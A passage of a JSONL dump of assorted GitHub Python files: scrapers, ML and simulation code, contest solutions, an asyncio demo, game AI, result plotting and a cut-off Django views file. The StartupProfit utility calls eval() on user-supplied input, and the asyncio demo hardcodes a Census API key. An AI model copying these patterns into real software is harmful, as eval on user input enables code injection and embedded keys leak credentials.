\n raw_notice_date = content.find('div', class_='date').find('p')\n day = raw_notice_date.find('span', class_='day').text\n month = raw_notice_date.text.split('/')[0].strip().replace(day, '')\n year = raw_notice_date.text.split('/')[1].strip()\n notice_date = f'{year}-{month}-{day}'\n notice_content = content.find('div', class_='entry-content').text\n tag_notice.update(\n {'type': notice_type, 'date': notice_date, 'content': notice_content})\n tag_notices.append(tag_notice)\n return tag_notices\n\n\ndef post_to_jsonbase(tag_notices):\n headers = {\n # Already added when you pass json=\n # 'content-type': 'application/json',\n }\n\n response = requests.put(\n 'https://jsonbase.com/lucas/tags', headers=headers, json=tag_notices)\n\n return response\n\ndef get_from_jsonbase():\n response = requests.get('https://jsonbase.com/lucas/tags')\n if response.status_code == 200:\n return response.json()\n\ndef send_bark(title, content):\n url = 'https://api.day.app/{}'.format(bark_key)\n\n headers = {\n 'Content-Type': 'application/json; charset=utf-8',\n }\n\n json_data = {\n 'body': content,\n 'title': title,\n }\n\n response = requests.post(url, headers=headers, json=json_data)\n\ndef compare_notices(tag_notices, old_notices):\n for notice in tag_notices:\n if notice not in old_notices:\n send_bark(notice['type'], notice['content'] + '\\n' + notice['date'])\n\ndef main():\n contents = get_tag_notice()\n tag_notices = handle_tag_notice(contents)\n old_notices = get_from_jsonbase()\n compare_notices(tag_notices, old_notices)\n response = post_to_jsonbase(tag_notices)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wanglz111/pipedream-script","sub_path":"tag_notice.py","file_name":"tag_notice.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2313969139","text":"import pickle\nimport json\nimport config\nimport numpy as np\n\nclass StartupProfit():\n \n def __init__(self, user_data):\n self.model_file_path = config.MODEL_FILE_PATH\n self.user_data = user_data\n\n def load_saved_data(self):\n with open(self.model_file_path, \"rb\") as f:\n self.model = pickle.load(f)\n\n with open(config.PROJECT_DATA_FILE_PATH, \"r\") as f:\n self.proj_data = json.load(f)\n\n def get_predicted_profit(self):\n\n self.load_saved_data()\n\n\n State = \"State_\"+self.user_data[\"State\"]\n\n State_index = self.proj_data[\"Columns\"] == State\n\n col_count = len(self.proj_data[\"Columns\"])\n test_array = np.zeros(col_count)\n test_array[0] = eval(self.user_data[\"R&D Spend\"])\n test_array[1] = eval(self.user_data[\"Administration\"])\n test_array[2] = eval(self.user_data[\"Marketing Spend\"])\n test_array[State_index] = 1\n print(test_array)\n Profit_Prediction = np.around(self.model.predict([test_array])[0],2)\n print(\"Predicted Profit :\", Profit_Prediction)\n\n return Profit_Prediction\n\nif __name__ ==\"__main__\":\n ins = StartupProfit()\n ins","repo_name":"YeshawantDighe/Startup_Profit","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74207490750","text":"import numpy as np\nfrom scipy.stats import levy_stable\nfrom math import tan, cos, pi\nimport dill\nfrom time import time\nfrom multiprocessing import Pool, cpu_count\nimport pickle as pk\nfrom scipy.io import savemat\nimport os\n\ndef make_dir(dirName):\n if not os.path.exists(dirName):\n os.makedirs(dirName)\n\ndef run_dill_encoded(payload):\n fun, args = dill.loads(payload)\n return fun(*args)\n\ndef apply_async(pool, fun, args):\n payload = dill.dumps((fun, args))\n return pool.apply_async(run_dill_encoded, (payload,))\n\ndef get_levy_stable(alpha, beta, delta, gamma, size_):\n return levy_stable.rvs(alpha, beta, delta, gamma, size = size_)\n\n\ndef fractional_diffusion(alpha_, beta_, theta_, D_, L, M, \n use_parallel = False, do_save = False):\n L = int(L)\n M = int(M)\n xnt = np.zeros((L, M))\n L_temp = 20*L\n tau = 1e-5\n c_alpha_ = np.power(D_*tau, 1/alpha_)\n c_beta_ = np.power(tau, 1/beta_)\n\n x_alpha_ = alpha_\n x_beta_ = - tan(theta_*pi/2) / tan(alpha_*pi/2)\n x_gamma_ = c_alpha_ * np.power(cos(theta_*pi/2), 1/alpha_)\n x_delta_ = - x_gamma_ * tan(theta_*pi/2)\n\n t_alpha_ = beta_\n t_beta_ = 1\n t_gamma_ = c_beta_ * np.power(cos(beta_*pi/2), 1/beta_)\n t_delta_ = t_gamma_ * tan(beta_*pi/2)\n M_thres = 200\n num_processes = cpu_count()\n ti = time()\n if M>M_thres:\n num_M = int(np.floor(M/M_thres))\n if use_parallel:\n pool = Pool(processes=num_processes)\n results_dt = []\n results_dx = []\n for i in range(num_M):\n results_dt.append(apply_async(pool, get_levy_stable, (t_alpha_, t_beta_, t_delta_, t_gamma_, (L_temp, M_thres))))\n results_dt = [p.get() for p in results_dt]\n dt = np.concatenate(results_dt, axis=1)\n\n for i in range(num_M):\n results_dx.append(apply_async(pool, get_levy_stable, (x_alpha_, x_beta_, x_delta_, x_gamma_, (L_temp, M_thres))))\n results_dx = [p.get() for p in results_dx]\n dx = np.concatenate(results_dx, axis=1)\n else:\n dt = np.zeros((L_temp, M))\n dx = np.zeros((L_temp, M))\n for i in range(num_M):\n dt_temp = levy_stable.rvs(t_alpha_, t_beta_, t_delta_, t_gamma_, size = (L_temp, M_thres))\n dt[:,i*M_thres:(i+1)*M_thres] = dt_temp\n\n dx_temp = levy_stable.rvs(x_alpha_, x_beta_, x_delta_, x_gamma_, size = (L_temp, M_thres))\n dx[:,i*M_thres:(i+1)*M_thres] = dx_temp\n else:\n dt = levy_stable.rvs(t_alpha_, t_beta_, t_delta_, t_gamma_, size = (L_temp, M))\n dx = levy_stable.rvs(x_alpha_, x_beta_, x_delta_, x_gamma_, size = (L_temp, M))\n\n dt_sum = np.concatenate((np.zeros((1, M)), np.cumsum(dt, axis=0)))\n dx_sum = np.concatenate((np.zeros((1, M)), np.cumsum(dx, axis=0)))\n T = np.linspace(0, np.min(dt_sum[-1,:]), L)\n\n nt = np.zeros((np.size(T), M), dtype=int)\n for i in range(M):\n jj = 0\n looping_complete = False\n for k in range(1+L_temp):\n while(True):\n if dt_sum[k,i]>=T[jj]:\n nt[jj,i] = k\n jj += 1\n if jj >= np.size(T):\n looping_complete = True\n break\n else:\n break\n if looping_complete:\n break\n for i in range(M):\n xnt[:,i] = dx_sum[nt[:,i],i]\n\n if do_save:\n data_dir_name = 'data'\n make_dir(data_dir_name)\n file_name = 'sim_frac_diff_a_%1.2f_b_%1.2f_t_%1.2f_D_%1.2f_L_%d_M_%d.p'%(alpha_, beta_, theta_, D_, L, M)\n pk.dump({'x':xnt, 'T':T}, open(os.path.join(data_dir_name, file_name), 'wb'))\n savemat(open(os.path.join(data_dir_name, file_name[:-1]+'mat'), 'wb'), {'xnt':xnt, 'T':T})\n\n return {'x':xnt, 'T':T}\n\n\nif __name__ == '__main__':\n M = 1e4\n L = 1e3\n alpha_ = 2\n beta_ = 0.5\n theta_ = 0\n D_ = 1\n trajectories = fractional_diffusion(alpha_, beta_, theta_, D_, L, M, use_parallel = True)","repo_name":"gaurav71531/fractDiffusion","sub_path":"gen_frac_diff_trajectories.py","file_name":"gen_frac_diff_trajectories.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"10228358108","text":"\"\"\"Make a class for the Heaviside function.\"\"\"\nfrom math import pi, sin\n\n\nclass Heaviside:\n def __init__(self, eps=0):\n self.eps = eps\n\n def __call__(self, x):\n eps = self.eps\n if eps == 0:\n if x < 0:\n return 0\n else:\n return 1\n elif eps > 0:\n if x < eps:\n return 0\n elif -eps <= x <= eps:\n return 1/2 + x/(2*eps) + sin(pi*x/eps)/(2*pi)\n else:\n return 1\n else:\n return NotImplemented\n","repo_name":"Zhuoyue-Huang/PoP-RM","sub_path":"Chapter7-class/Ex/Heaviside_class19.py","file_name":"Heaviside_class19.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11150412093","text":"import sys\r\n\r\nif __name__ == '__main__':\r\n\r\n s = (int(x) for x in sys.stdin.read().split())\r\n\r\n procesos = next(s)\r\n tiempo = next(s)\r\n\r\n listaprocesos = []\r\n listatiempos = []\r\n\r\n for i in range(procesos):\r\n llave = next(s)\r\n valor = next(s)\r\n division = valor // tiempo\r\n if valor % tiempo != 0:\r\n listaprocesos.append(llave)\r\n listatiempos.append(division + 1)\r\n else:\r\n listaprocesos.append(llave)\r\n listatiempos.append(division)\r\n\r\n for indice in range(len(listatiempos)):\r\n minimo = min(listatiempos)\r\n indicearemover = listatiempos.index(minimo)\r\n print(listaprocesos[indicearemover])\r\n listaprocesos.pop(indicearemover)\r\n listatiempos.pop(indicearemover)\r\n","repo_name":"A01751587/Competitive-Programming","sub_path":"Concurso_28_10/Procesos.py","file_name":"Procesos.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74737372670","text":"# Ramsay: \"(...) você vence se conseguir adivinhar quem eu sou e por que estou torturando você.\"\n# Theon deve pensar rápido e adivinhar quem é seu algoz! Entretanto,\n# Ramsay já decidiu o que ele irá fazer depois que Theon der sua resposta.\n# Theon pode dizer que seu algoz é alguma dentre N pessoas. Considere que as pessoas são numeradas de 1 a N.\n# Se Theon responder que seu algoz é a pessoa i, Ramsay irá atingi-lo Ti vezes.\n# Sua tarefa é ajudar Theon a determinar qual deve ser sua resposta de forma\n# a minimizar o número de vezes que ele será atingido.\nimport sys\n\nN = int(input())\npersons = sys.stdin.readline().split()\n\nlowest_pos = 0\nfor i in range(N):\n if i == 0:\n lowest = persons[i]\n continue\n if persons[i] < lowest:\n lowest = persons[i]\n lowest_pos = i\nprint(lowest_pos + 1)","repo_name":"andersonbispos/desafios-bootcamp-dio","sub_path":"resolvendoAlgoritmosPython/respostaTheon.py","file_name":"respostaTheon.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31511234607","text":"import asyncio\nimport random\nimport requests\n\ncensus_key = 'a88b50af47f987e2e4f7b8a8178e0071fa06d360'\npop_2021 = f'https://api.census.gov/data/2021/pep/population?get=POP_2021&for=us:*&key={census_key}'\npop_2019 = f'https://api.census.gov/data/2019/pep/population?get=POP&for=us:*&key={census_key}'\npop_2017 = f'https://api.census.gov/data/2017/pep/population?get=POP&for=us:*&key={census_key}'\n\n\n# urls = [pop_2021, pop_2019, pop_2017]\n\nasync def example_using_executor():\n \"\"\"\n This seems to be the most simple and straight forward way to do something like execute synchronous\n code (such as the request library) inside an async function (using async/await syntax)\n \"\"\"\n loop = asyncio.get_event_loop() # 'grab a handle for event loop'\n future1 = loop.run_in_executor(None, requests.get, pop_2021) # run in the said event loop\n future2 = loop.run_in_executor(None, requests.get, pop_2019) # requests.get is our function to execute,\n future3 = loop.run_in_executor(None, requests.get, pop_2017) # pop_* is an arg to pass to the function\n\n response1 = await future1\n response2 = await future2\n response3 = await future3\n print('2021 US population', response1.json()[1][0])\n print('2019 US population', response2.json()[1][0])\n print('2017 US population', response3.json()[1][0])\n\n\nasync def io_bound_task(i):\n print(f\"start: {i}\")\n sleep_time = random.randint(0, 5)\n await asyncio.sleep(sleep_time)\n print(f\"end: {i}\")\n return i\n\n\nasync def run_multiple_tasks():\n \"\"\"\n Remember: Concurrency is a broad term that covers asynchronous and multiprocessor/parallelism\n\n To help remember asynchronous vs parallelism, asynchronous is single threaded, only one co-routine can\n ocupy the threads 'focus' at a given time. parallel programming uses multiple threads,\n each task is running independently, pretty straight forward :)\n \"\"\"\n my_results = []\n # If we'd like to start a number of tasks and process them as completed, we should use the following\n for f in asyncio.as_completed([io_bound_task(i) for i in range(1, 6)]):\n my_results.append(await f)\n print('my results: ', my_results) # we don't really have any guarantees on start or stop order\n\n # we could use 'await' in list comp to store the results (kinda inception-y)\n # foo = [await f for f in asyncio.as_completed([io_bound_task(i) for i in my_task_ids])]\n\n\ndef main():\n # We can run multiple async tasks from a synchronous function like so\n print('Starting the main (synchronous) function')\n asyncio.run(run_multiple_tasks())\n print('End the main (synchronous) function')\n\n\nif __name__ == \"__main__\":\n # asyncio.run(example_using_executor())\n main()\n","repo_name":"dpgraham4401/snippets","sub_path":"Python/using_asyncio.py","file_name":"using_asyncio.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4835983947","text":"from direct.directnotify import DirectNotifyGlobal\nfrom toontown.battle import DistributedBattleFinalAI\nfrom toontown.toonbase import ToontownBattleGlobals\n\nclass DistributedBattleMinibossAI(DistributedBattleFinalAI.DistributedBattleFinalAI):\n notify = DirectNotifyGlobal.directNotify.newCategory('DistributedBattleMinibossAI')\n\n def __init__(self, air, bossCog, roundCallback, finishCallback, battleSide):\n DistributedBattleFinalAI.DistributedBattleFinalAI.__init__(self, air, bossCog, roundCallback, finishCallback, battleSide)\n\n def startBattle(self, toonIds, suits):\n self.joinableFsm.request('Joinable')\n for toonId in toonIds:\n if self.addToon(toonId):\n self.activeToons.append(toonId)\n\n self.d_setMembers()\n for suit in suits:\n joined = self.suitRequestJoin(suit)\n\n self.d_setMembers()\n self.b_setState('ReservesJoining')\n\n def resume(self, joinedReserves):\n if len(joinedReserves) != 0:\n for info in joinedReserves:\n joined = self.suitRequestJoin(info)\n\n self.d_setMembers()\n self.b_setState('ReservesJoining')\n elif len(self.suits) == 0:\n battleMultiplier = ToontownBattleGlobals.getBossBattleCreditMultiplier(self.battleNumber)\n for toonId in self.activeToons:\n toon = self.getToon(toonId)\n if toon:\n recovered, notRecovered = self.air.questManager.recoverItems(toon, self.suitsKilledThisBattle, self.zoneId)\n self.toonItems[toonId][0].extend(recovered)\n self.toonItems[toonId][1].extend(notRecovered)\n\n self.d_setMembers()\n self.d_setBattleExperience()\n self.b_setState('Reward')\n else:\n if self.resumeNeedUpdate == 1:\n self.d_setMembers()\n if len(self.resumeDeadSuits) > 0 and self.resumeLastActiveSuitDied == 0 or len(self.resumeDeadToons) > 0:\n self.needAdjust = 1\n self.setState('WaitForJoin')\n self.resumeNeedUpdate = 0\n self.resumeDeadToons = []\n self.resumeDeadSuits = []\n self.resumeLastActiveSuitDied = 0","repo_name":"Lluxent/Toontown-School-House","sub_path":"toontown/battle/DistributedBattleMinibossAI.py","file_name":"DistributedBattleMinibossAI.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28951979280","text":"m= int(input())\nn= int(input())\n\na = [0,0] + [1]*(n-1)\nprimes=[]\n\nfor i in range(2,n+1):\n if a[i]:\n if i >= m:\n primes.append(i)\n for j in range(2*i, n+1, i):\n a[j] = 0\nif primes == []:\n print(-1)\nelse:\n print(sum(primes),primes[0], sep='\\n')","repo_name":"MONKEYZ9/algorithm","sub_path":"study/backjoon/backjoon_2581.py","file_name":"backjoon_2581.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"23164185762","text":"import csv\r\nfile = open(\"main.csv\")\r\ncsvreader = csv.reader(file)\r\nheader = next(csvreader)\r\n\r\nrows = []\r\nfor row in csvreader:\r\n rows.append(row)\r\n\r\nreq=[]\r\nfor j in range(0,len(rows)):\r\n temp=[]\r\n \r\n temp.append(rows[j][0])\r\n temp.append(int(rows[j][30]))\r\n temp.append(int(rows[j][31]))\r\n \r\n req.append(temp)\r\n\r\n\r\nimport operator\r\nlis = sorted(req, key=operator.itemgetter(2, 1,0))\r\nlis.reverse()\r\n\r\nnewheader=['team','yellow cards','red cards']\r\nwith open('output.csv', 'w', encoding='UTF8', newline='') as f:\r\n writer = csv.writer(f)\r\n\r\n writer.writerow(newheader)\r\n # write multiple rows\r\n writer.writerows(lis)\r\nfile.close()\r\n","repo_name":"NaveenAare/bungeetechasignment","sub_path":"bungeetech assignment/output/answer-3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"36966718247","text":"import csv\nimport json\nimport re\nimport subprocess\nfrom argparse import ArgumentParser\n\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\n\nimport numpy as np\n\n\ndef get_args():\n parser = ArgumentParser()\n parser.add_argument('--all', action=\"store_true\", help=\"Plot all results in a single plot\")\n parser.add_argument('--per-arch', action=\"store_true\", help=\"Plot results grouped by architectures\")\n parser.add_argument('--per-objective', action=\"store_true\", help=\"Plots results grouped by objectives\")\n parser.add_argument('--per-t0-adapted', action=\"store_true\", help=\"Plots only T0 adapted models\")\n parser.add_argument('--aggregated-results', action=\"store_true\", help=\"Plots agregated results\")\n args = parser.parse_args()\n\n assert args.all or args.per_arch or args.per_objective or args.per_t0_adapted\n\n return args\n\ndef load_t0_results(csv_path):\n with open(csv_path, \"r\") as f:\n return list(csv.DictReader(f))\n\ndef load_t5x_results(dir_path: Path):\n def remove_t0_eval(filename:str):\n name = filename.replace(\"_t0_eval\", \"\")\n name = name.replace(\"_bs2048\", \"\")\n name = name.replace(\"_c4\", \"\")\n return name\n\n all_results = {}\n for child in dir_path.iterdir():\n filepath = child / \"results.json\"\n if filepath.is_file():\n with open(filepath, \"r\") as fi:\n results = json.load(fi)\n all_results[remove_t0_eval(child.name)] = results\n print(all_results.keys())\n return all_results\n\ndef get_experiment_name(filename: str):\n name = re.sub(r\"_([0-9]*)$\", r\" [\\1]\", filename)\n name = name.replace(\"span_corruption\", \"SC\")\n name = re.sub(r\"^enc_dec\", \"ED\", name)\n name = re.sub(r\"^nc_dec\", \"NCD\", name)\n name = re.sub(r\"^c_dec\", 'CD', name)\n name = name.replace(\"full_lm\", \"FLM\")\n name = name.replace(\"prefix_lm\", \"PLM\")\n name = re.sub(r\"t0_adapt_([0-9]+)\", r\"T0(\\1)\", name)\n if name[:3] == \"CD_\":\n name = re.sub(r\"lm_adapt_([0-9]+)\", r\"FLM(\\1)\", name)\n name = re.sub(r\"t0_adapt_nc_([0-9]+)\", r\"T0 AS NC (\\1)\", name)\n name = re.sub(r\"nc_sc_([0-9]+)\", r\"SC as NC(\\1)\", name)\n name = re.sub(r\"nc_t0_([0-9]+)\", r\"T0 as NC(\\1)\", name)\n elif name[:4] == \"NCD_\" or name[:3] == \"ED_\":\n if \"flm_adapt\" in name:\n name = re.sub(r\"flm_adapt_([0-9]+)\", r\"FLM AS CD(\\1)\", name)\n else:\n name = re.sub(r\"lm_adapt_([0-9]+)\", r\"PLM(\\1)\", name)\n else:\n raise NotImplementedError\n name = name.replace(\"_\", \" + \")\n return name\n\nTASKS = {\n 'super_glue_copa': ('COPA', 0.5),\n 'anli_r1': ('ANLI R1', 1/3),\n 'anli_r2': ('ANLI R2', 1/3),\n 'anli_r3': ('ANLI R3', 1/3),\n 'super_glue_cb': ('CB', 1/3),\n 'super_glue_rte': ('RTE', 0.5),\n 'super_glue_wsc.fixed': ('WSC', 0.5),\n 'winogrande_winogrande_xl': ('Winogrande', 0.5),\n 'super_glue_wic': ('WiC', 0.5),\n 'hellaswag': ('HellaSwag', 0.25),\n 'story_cloze_2016': ('StoryCloze', 0.5),\n}\ndef plot(t5x_data, t0_data):\n args = get_args()\n\n t5x_data, t5x_experiments = t5x_data\n assert len(TASKS) == 11\n fig, axs = plt.subplots(2, 6, figsize=(20, 8))\n axs = axs.flatten()\n\n task_min_score = {}\n task_max_score = {}\n task_median_score = {}\n for n, (task, (task_name, random_baseline)) in enumerate(TASKS.items()):\n t5lm_scores = [float(r[\"score\"]) for r in t0_data\n if r[\"runs\"] == \"xxl-lm-d4-091621\"\n and r[\"dataset_name\"] == task\n and r[\"metric_name\"] == \"accuracy (Rank)\"\n and r[\"score\"]]\n t0_scores = [float(r[\"score\"]) for r in t0_data\n if r[\"runs\"] == \"xxl-lm-d4-091621-512\"\n and r[\"dataset_name\"] == task\n and r[\"metric_name\"] == \"accuracy (Rank)\"\n and r[\"score\"]]\n t5x_scores_with_name = [\n (\n get_experiment_name(name),\n [s[\"accuracy\"] for k, s in t5x_data[name].items() if task.replace(\"anli_\", \"\") in k]\n )\n for name in t5x_experiments\n ]\n\n all_experiment_scores_with_name = [(\"T5 + LM\", t5lm_scores), (\"T0\", t0_scores), *t5x_scores_with_name]\n # Plot\n axs[n].axhline(100 * random_baseline, 0, len(all_experiment_scores_with_name), label=\"Random\")\n for i, (exp_name, scores) in enumerate(all_experiment_scores_with_name):\n axs[n].scatter([i] * len(scores), scores, s=50, alpha=0.4, label=exp_name)\n axs[n].set_title(task_name)\n\n # Gather median values\n task_min_score[task] = [(\"Random\", 100 * random_baseline)] + [(exp_name, np.min(scores)) for (exp_name, scores) in all_experiment_scores_with_name]\n task_max_score[task] = [(\"Random\", 100 * random_baseline)] + [(exp_name, np.max(scores)) for (exp_name, scores) in all_experiment_scores_with_name]\n task_median_score[task] = [(\"Random\", 100 * random_baseline)] + [(exp_name, np.median(scores)) for (exp_name, scores) in all_experiment_scores_with_name]\n\n last_ax_id = len(TASKS) - 1\n axs[last_ax_id].legend(bbox_to_anchor=(1, 1), loc=\"upper left\")\n for ax in axs[last_ax_id + 1:]:\n ax.set_visible(False)\n\n if args.aggregated_results:\n # ====== Plot agregated values =======\n fig, axs = plt.subplots(1, 3, figsize=(20, 8))\n axs = axs.flatten()\n last_ax_id=0\n experiment_names = [elt[0] for elt in next(iter(task_median_score.values()))]\n\n def plot_scores_with_name(median_score_with_name, max_score, min_score, ax, title):\n assert len(median_score_with_name) == len(max_score) and len(median_score_with_name) == len(min_score)\n ax.axhline(\n median_score_with_name[0][1],\n 0, len(median_score_with_name) - 1,\n label=median_score_with_name[0][0]\n )\n for i, ((name, median_score), max_score, min_score) in enumerate(zip(median_score_with_name[1:], max_score[1:], min_score[1:])):\n ax.errorbar(\n i, median_score, ((median_score - min_score,), (max_score - median_score,)),\n fmt=\"o\", elinewidth=1, label=name)\n ax.set_title(title)\n\n def get_average_normalised_score(task_scores):\n normalised_scores = []\n for scores_with_name in task_scores.values():\n random_name, random_baseline = scores_with_name[0]\n assert random_name == \"Random\"\n normalised_scores_per_task = [(scores - random_baseline) / (100 - random_baseline) for _, scores in\n scores_with_name]\n normalised_scores.append(normalised_scores_per_task)\n return np.mean(normalised_scores, axis=0)\n\n def get_average_score(task_scores):\n return np.mean(\n [[scores for _, scores in scores_with_name] for scores_with_name in task_scores.values()], axis=0)\n\n # Plot average task score\n average_task_median_score = get_average_score(task_median_score)\n assert len(experiment_names) == len(average_task_median_score)\n average_task_media_score_with_name = list(zip(experiment_names, average_task_median_score))\n del average_task_median_score\n plot_scores_with_name(\n median_score_with_name=average_task_media_score_with_name,\n max_score=get_average_score(task_max_score),\n min_score=get_average_score(task_min_score),\n ax=axs[last_ax_id],\n title=f\"Average of task median scores\"\n )\n last_ax_id += 1\n\n # Plot average of task median normalised scores `normalised_score = (score - random) / (1 - random)`\n average_task_normalised_median_score = get_average_normalised_score(task_median_score)\n assert len(experiment_names) == len(average_task_normalised_median_score)\n average_task_normalised_median_score_with_name = list(\n zip(experiment_names, average_task_normalised_median_score))\n del average_task_normalised_median_score\n plot_scores_with_name(\n median_score_with_name=average_task_normalised_median_score_with_name,\n max_score=get_average_normalised_score(task_max_score),\n min_score=get_average_normalised_score(task_min_score),\n ax=axs[last_ax_id],\n title=f\"Average of task normalised median scores\"\n )\n last_ax_id += 1\n\n axs[last_ax_id -1].legend(bbox_to_anchor=(1, 1), loc=\"upper left\")\n for ax in axs[last_ax_id:]:\n ax.set_visible(False)\n\n\ndef main():\n args = get_args()\n\n # Define directories\n results_dir = Path(__file__).resolve().parent.parent / \"results\" / \"t0_eval\"\n t0_results_dir = results_dir / \"t0\"\n t5x_results_dir = results_dir / \"t5x\"\n subprocess.run([\"mkdir\", \"-p\", t0_results_dir])\n subprocess.run([\"mkdir\", \"-p\", t5x_results_dir])\n\n # Sync previous results\n # gsutil cp gs://bigscience/experiment_d/aux_experiments/all_datasets_and_runs.csv ../results/t0_eval/t0\n if not (t0_results_dir / \"all_datasets_and_runs.csv\").exists():\n subprocess.run([\"gsutil\", \"cp\", \"gs://bigscience/experiment_d/aux_experiments/all_datasets_and_runs.csv\", t0_results_dir])\n # gsutil rsync -rd gs://bigscience-t5x/arch_objective_exps_v2/t0_eval ../results/t0_eval/t5x\n subprocess.run([\"gsutil\", \"-m\", \"rsync\", \"-rd\", \"-x\", \".*inference_eval\", \"gs://bigscience-t5x/arch_objective_exps_v2/t0_eval\", t5x_results_dir])\n\n # Load results\n t0_data = load_t0_results(t0_results_dir / \"all_datasets_and_runs.csv\")\n t5x_data = load_t5x_results(t5x_results_dir)\n\n # Plot results\n # We group experiments by:\n # - objective\n # - architecture\n LM_ADAPT_FROM = [28000, 30000, 58768]\n PRETRAIN_AND_T0_ADAPT_STEPS = [(32768, 37768), (65536, 70536), (131072, 141072), (169984, 179984), (196608, 206608)]\n def key_architecture(experiment_name):\n if experiment_name[0] == 'c':\n return 0\n elif experiment_name[0] == 'n':\n return 1\n elif experiment_name[0] == 'e':\n return 2\n else:\n raise NotImplementedError\n def key_objective(experiment_name):\n suffixes = []\n for max_steps,_ in PRETRAIN_AND_T0_ADAPT_STEPS:\n suffixes += [\n f\"lm_{max_steps}\",\n *[f\"{lm_type}_adapt_{lm_adapt}_{max_steps}\" for lm_adapt in LM_ADAPT_FROM for\n lm_type in [\"_lm\", \"_flm\", \"_plm\"]]\n ]\n for t0_adapt_from, max_steps in PRETRAIN_AND_T0_ADAPT_STEPS:\n suffixes += [\n f\"lm_t0_adapt_{t0_adapt_from}_{max_steps}\",\n f\"lm_t0_adapt_nc_{t0_adapt_from}_{max_steps}\",\n f\"span_corruption_t0_adapt_{t0_adapt_from}_{max_steps}\",\n *[f\"{lm_type}_adapt_{lm_adapt}_t0_adapt_{t0_adapt_from}_{max_steps}\" for lm_adapt in LM_ADAPT_FROM for\n lm_type in [\"_lm\", \"_flm\", \"_plm\"]],\n f\"-nc_sc_{t0_adapt_from}-nc_t0_{max_steps}\"\n ]\n\n for i, suffix in enumerate(suffixes):\n if experiment_name.endswith(suffix):\n return i\n raise NotImplementedError(f\"{experiment_name}\")\n\n t5x_experiments = list(t5x_data.keys())\n # Define single ordering\n t5x_experiments = sorted(t5x_experiments, key=lambda x: (key_objective(x), key_architecture(x)))\n\n if args.all:\n plot((t5x_data, t5x_experiments), t0_data)\n\n def plot_per_group(group_fn):\n t5x_objective_keys = set(group_fn(x) for x in t5x_experiments)\n for group_id in t5x_objective_keys:\n t5x_experiments_per_group = [x for x in t5x_experiments if group_id == group_fn(x)]\n plot((t5x_data, t5x_experiments_per_group), t0_data)\n if args.per_objective:\n plot_per_group(key_objective)\n if args.per_arch:\n plot_per_group(key_architecture)\n if args.per_t0_adapted:\n def key_is_t0_adapted(experiment_name):\n return \"_t0\" in experiment_name\n plot_per_group(key_is_t0_adapted)\n\n plt.show()\n print(\"Finished\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"zphang/architecture-objective","sub_path":"bigscience/scripts/plot_t5x_results_vs_t0.py","file_name":"plot_t5x_results_vs_t0.py","file_ext":"py","file_size_in_byte":12223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73131983838","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\n\nimport os\nimport sys\n\nif __name__ == '__main__':\n astropy_path = sys.argv[-1]\n sys.argv = sys.argv[:-1]\n sys.path.insert(0, astropy_path)\n\n from astropy import wcs\n import numpy as np\n from distutils.core import setup, Extension\n\n if sys.platform == 'win32':\n # These are written into wcsconfig.h, but that file is not\n # used by all parts of wcslib.\n define_macros = [\n ('YY_NO_UNISTD_H', None),\n ('_CRT_SECURE_NO_WARNINGS', None),\n ('_NO_OLDNAMES', None), # for mingw32\n ('NO_OLDNAMES', None), # for mingw64\n ('__STDC__', None) # for MSVC\n ]\n else:\n define_macros = []\n\n try:\n numpy_include = np.get_include()\n except AttributeError:\n numpy_include = np.get_numpy_include()\n\n wcsapi_test_module = Extension(\n 'wcsapi_test',\n include_dirs=[\n numpy_include,\n os.path.join(wcs.get_include(), 'astropy_wcs'),\n os.path.join(wcs.get_include(), 'wcslib')\n ],\n # Use the *full* name to the c file, since we can't change the cwd\n # during testing\n sources=[str(os.path.join(os.path.dirname(__file__),\n 'wcsapi_test.c'))],\n define_macros=define_macros)\n\n setup(\n name='wcsapi_test',\n ext_modules=[wcsapi_test_module])\n","repo_name":"holzschu/Carnets","sub_path":"Library/lib/python3.7/site-packages/astropy-4.0-py3.7-macosx-10.9-x86_64.egg/astropy/wcs/tests/extension/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":510,"dataset":"github-code","pt":"51"} +{"seq_id":"29086091557","text":"from django.http import Http404, JsonResponse\nfrom django.shortcuts import render, redirect\nimport datetime as dt\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Profile, Project, Vote\nfrom django.contrib.auth.models import User\nfrom .forms import *\nfrom django.urls import reverse\nfrom rest_framework.views import APIView\nfrom .permissions import IsAdminOrReadOnly\nfrom rest_framework import status\nfrom rest_framework.response import Response\n# from .permissions import IsAdminOrReadOnly\nfrom .serializers import *\n\nimport cloudinary\nimport cloudinary.uploader\nimport cloudinary.api\n\n\n\n# Create your views here.\n@login_required(login_url=\"/accounts/login/\")\ndef home(request):\n project=Project.objects.all()\n \n return render(request, 'home.html', {\"projects\": project})\n \n#user profile\n@login_required(login_url='/accounts/login')\ndef 